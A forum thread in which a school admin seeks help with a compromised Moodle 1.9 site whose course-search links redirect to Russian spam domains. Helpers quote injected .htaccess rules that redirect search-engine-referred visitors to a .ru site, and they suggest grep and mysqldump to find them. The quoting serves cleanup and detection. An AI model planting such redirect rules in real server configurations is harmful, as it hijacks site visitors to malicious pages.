Moodle hacked

Hi,

It looks like our Moodle has been hacked. When a user tries to find a course using 'Search Courses' , clicking on any of the links on the returned page will send them to somewhere random on the internet - mainly russian sites, such as:

diskwarrioradvertisements.ru/Documentation?8

** By Links, I mean ALL links on the page. Even to the users profile, logout etc.

Moodle & php are not really my thing, so I'm in the dark here.

I can see that the 'Search Courses' 'GO' button fires up courses/search.PHP & I've tried replacing this with another php file which I know is clean but it still does the same thing. Search.PHP has a couple of includes (config.php and lib.php) so I'll check them.

I've also searched the database for the Russian site mentioned above but I can't find it, so I guess it must be hardcoded into a php script somewhere?

Everything else works fine. You wouldn't know there was anything wrong unless you searched for a course. I'd like to solve this with a minimum of fuss & take measures to prevent it happening again.

We are running Moodle 1.9 on an Ubuntu server

Cheers!

I would just replace all the files with ones from a download. Otherewise you can't guarantee what other nasties are hiding.

If you have a backup, now would be a good time to use it...

Quote:

---

Originally Posted by CapnPugwash

Hi,

It looks like our Moodle has been hacked. When a user tries to find a course using 'Search Courses' , clicking on any of the links on the returned page will send them to somewhere random on the internet - mainly russian sites, such as:

diskwarrioradvertisements.ru/Documentation?8

** By Links, I mean ALL links on the page. Even to the users profile, logout etc.

Moodle & php are not really my thing, so I'm in the dark here.

I can see that the 'Search Courses' 'GO' button fires up courses/search.PHP & I've tried replacing this with another php file which I know is clean but it still does the same thing. Search.PHP has a couple of includes (config.php and lib.php) so I'll check them.

I've also searched the database for the Russian site mentioned above but I can't find it, so I guess it must be hardcoded into a php script somewhere?

Everything else works fine. You wouldn't know there was anything wrong unless you searched for a course. I'd like to solve this with a minimum of fuss & take measures to prevent it happening again.

We are running Moodle 1.9 on an Ubuntu server

Cheers!

---

Clough hall by any chance? :getmecoat:

Seems there's a lot of redirect hacks going around at the moment within schools.

Most of them are editing the htaccess files, and putting redirects within them (often in white text :) )

Check for a line like this in your htaccess files

Code:

---

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|..suchmaschine|web-archiv|infospace)\.(.*)
RewriteRule ^(.*)$ http://diskwarrioradvertisements.ru/Documentation?8 [R=301,L]

---

Might be slightly different obviously depending on your version of it, but might help.

Steve

There we go, even found few examples of people with same one online :)

Quote:

---

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|ex cite|altavista|msn|netscape|aol|hotbot|goto|infose ek|mamma|alltheweb|lycos|search|metacrawler|bing|d ogpile|facebook|twitter|blog|live|myspace|linkedin |flickr|filesearch|yell|openstat|metabot|gigablast |entireweb|amfibi|dmoz|yippy|walhello|webcrawler|j ayde|findwhat|teoma|euroseek|wisenut|about|thunder stone|ixquick|terra|lookle|metaeureka|searchspot|s lider|topseven|allthesites|libero|clickey|galaxy|b rainysearch|pocketflier|verygoodsearch|bellnet|fre enet|fireball|flemiro|suchbot|acoon|devaro|fastbot |netzindex|abacho|allesklar|suchnase|schnellsuche| sharelook|sucharchiv|suchbiene|suchmaschine|infosp ace)\.(.*)
RewriteRule ^(.*)$ http://diskwarrioradvertisements.ru/Documentation?8 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|freenet|a rcor|alexana|tiscali|kataweb|voila|sfr|startpagina |kpnvandaag|ilse|wanadoo|telfort|hispavista|passag en|spray|eniro|telia|bluewin|sympatico|nlsearch|at search|klammeraffe|sharelook|suchknecht|ebay|abizd irectory|alltheuk|bhanvad|daffodil|click4choice|ex alead|findelio|gasta|gimpsy|globalsearchdirectory| hotfrog|jobrapido|kingdomseek|mojeek|searchers|sim plyhired|splut|thisisouryear|ukkey|uwe|friendsreun ited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala| limier|express|bestireland|browseireland|finditire land|iesearch|kompass|startsiden|confex|finnalle|g ulesider|keyweb|finnfirma|kvasir|savio|sol|startsi den|allpages|america|botw|chapu|claymont|clickz|cl ush|ehow|findhow|icq|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://diskwarrioradvertisements.ru/Documentation?8 [R=301,L]

---

Anything that's like that is all bad in .htaccess files

Steve

Hi Steve, thanks for that - how did you know I was from Clough Hall?

OK, here's how it's looking. Moodle isn't something I know a lot about but it looks like there are three areas - the database, the course data & Moodle itself.

I've searched the database for any mention of the dodgy web sites and it's clean. I've replaced the main Moodle folder with one that I know is clean and that didn't change anything. So I'm assuming it's in the data part where the courses are. We do back up the Moodle server but the problem wasn't reported for a few weeks....

It makes total sense that it's a htaccess file issue... but I've checked everyone of them and can't find anything!

What could I be missing? I could be making some poor assumptions here so please feel free to correct me.

Can pretty much guarantee it's at least partially a htaccess issue. As it'll fire off every time I redirect from google to your site, yet not loading it directly :) It's even doing it off your main VLE page, without searching/logging in.

Also seems to be changing where it's redirecting to, unless you've done a clean and got infected again? (From your comment above, guessing you replaced main folder, but not the actual issue)

See below:

Attachment 15112

Attachment 15113


When you checked your htaccess files did you check white space too? Often adds millions of white lines into them, to stop you scrolling down further etc

Depends on your opinion of course, but any objects to uploading some of your htaccess files so we can take a look? Understand if you don't want though.

Steve

Hi Steve,

I'd be happy to let you see the Htaccess files, I really need to get to the bottom of this. When I've looked at the files, I've done a search 'RewriteCond' - I hoped that that this would get around the white text issue.

Yes, I replaced the main Moodle folder so I presume, whatever is lurking in there has *got* to be in the MoodleData folder - am I right?

Cheers for your help, much appreciated.

@CapnPugwash - how are your searching? Using grep from a shell on the box should be fairly foolproof.

Also how did you search the database?

Hi,

Well you're exposing my ignorance here (which is a good thing for me) I've just been opening the htaccess files as text files and doing a standard word search.

Probably my poor assumption. You are running on a Windows box - not a *nix box?

I'm running Moodle on an Ubuntu server. TBH, I don't know much about it, it was set up by a fella who left a while back and I've never had the time to sit down and get to grips with it.

Ok. So how did you do the database search? How did you 'open text files'? If you could use ssh or telnet to login to the box and use a recursive grep search to look for the offending rewrite rules from the web root, that shouldn't miss anything. Simmilarly for the database, using mysqldump to produce a text file of the database then grepping that will be quite thorough.

Quote:

---

Originally Posted by pcstru

Ok. So how did you do the database search? How did you 'open text files'? If you could use ssh or telnet to login to the box and use a recursive grep search to look for the offending rewrite rules from the web root, that shouldn't miss anything. Simmilarly for the database, using mysqldump to produce a text file of the database then grepping that will be quite thorough.

---

Hi,

I used PHPMYADMIN to search the database
In Ubuntu I searched for the htaccess files, right clicked on them and opened in a text editor

I'll have a look at grep, thanks for the pointer

Well, after looking at this all morning, I'm now more confused than ever.

To recap: I'm running Moodle 1.9 on an Ubuntu server.

When users log into Moodle, everything seems all right. However, when they 'Search Courses' , the returned page will look all right (hovering the mouse over all the links, I can see they are as they should be) but clicking on any link will take to one of these tupe of pages:

unchallengedminimoogs.ru
oomphstereomono.ru
convertednextpages.ru

I replaced my Moodle folder with a 'clean' version
I renamed my current MoodleData folder and created a new one with three empty folders inside (cache, sessions, and temp)

I then went to my Moodle site, logged in and checked the 'search courses' functionality - same problem with the nasty re-directs.

I did an SQLdump of my database, opened it in a text editor and searched for any reference to the websites mentioned - found nothing.

.... I really don't understand.... I agree with Steve, the most obvious culprit is a hacked htaccess file... but if it's not in either my Moodle or MoodleData folders.... where could it be?!